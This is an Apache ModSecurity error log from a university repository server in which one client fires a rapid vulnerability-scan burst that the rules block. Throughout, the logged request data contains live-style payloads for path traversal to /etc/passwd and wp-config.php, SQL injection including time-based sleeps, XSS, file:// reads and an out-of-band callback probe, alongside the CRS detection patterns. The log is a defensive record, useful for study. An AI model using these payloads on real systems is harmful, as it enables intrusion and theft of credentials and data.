[Tue Aug 29 11:36:29.366954 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zcCo-f0AAASEJdkAAAAE"]
[Tue Aug 29 11:36:30.421243 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAUbg7YAAABQ"]
[Tue Aug 29 11:36:32.496479 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAUbg7sAAABQ"]
[Tue Aug 29 11:36:33.510488 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAASHiDYAAAAD"]
[Tue Aug 29 11:36:33.516987 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWoV1cAAAAV"]
[Tue Aug 29 11:36:34.353614 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAASEJfIAAAAE"]
[Tue Aug 29 11:36:34.361267 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAVsUdEAAAAb"]
[Tue Aug 29 11:36:36.977548 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAT@Kz0AAAA2"]
[Tue Aug 29 11:36:37.368559 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWa-VIAAAAI"]
[Tue Aug 29 11:36:37.413133 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAUbg9AAAABQ"]
[Tue Aug 29 11:36:38.374823 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWvFCAAAAAa"]
[Tue Aug 29 11:36:39.461582 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gtr4tz4ekhebb7.oast.site found within TX:1: cjmnbitjmimt14dgn26gtr4tz4ekhebb7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAV9b1AAAAAA"]
[Tue Aug 29 11:36:41.447982 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWquqMAAAAX"]
[Tue Aug 29 11:36:42.355477 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAW1WaIAAAAD"]
[Tue Aug 29 11:36:42.377032 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWvFCUAAAAa"]
[Tue Aug 29 11:36:44.375097 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWcCS0AAAAL"]
[Tue Aug 29 11:36:45.482421 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAASEJiMAAAAE"]
[Tue Aug 29 11:36:49.514578 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAQSWToAAAA0"]
[Tue Aug 29 11:36:56.558170 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAV9b3UAAAAA"]
[Tue Aug 29 11:36:57.475931 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWnjooAAAAT"]
[Tue Aug 29 11:37:07.418685 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAUbhF4AAABQ"]
[Tue Aug 29 11:37:09.432539 2023] [:error] [pid 1471] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW-Qy0AAAAN"]
[Tue Aug 29 11:37:15.363095 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11@8Co-f0AAAWuq9EAAAAZ"]
[Tue Aug 29 11:37:16.597009 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAUbhLAAAABQ"]
[Tue Aug 29 11:37:16.650589 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWdsuAAAAAM"]
[Tue Aug 29 11:37:27.362533 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAW9IaoAAAAI"]
[Tue Aug 29 11:37:35.391913 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAWurCgAAAAZ"]
[Tue Aug 29 11:37:37.644344 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAV1ES4AAAAd"]
[Tue Aug 29 11:37:45.417109 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXEH8UAAAAN"]
[Tue Aug 29 11:37:47.551596 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXA9jcAAAAO"]
[Tue Aug 29 11:37:50.476170 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAARiDsUAAAAJ"]
[Tue Aug 29 11:37:52.387910 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAARiDsoAAAAJ"]
[Tue Aug 29 11:37:59.487334 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXVynkAAAAB"]
[Tue Aug 29 11:37:59.529323 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHwAAAAD"]
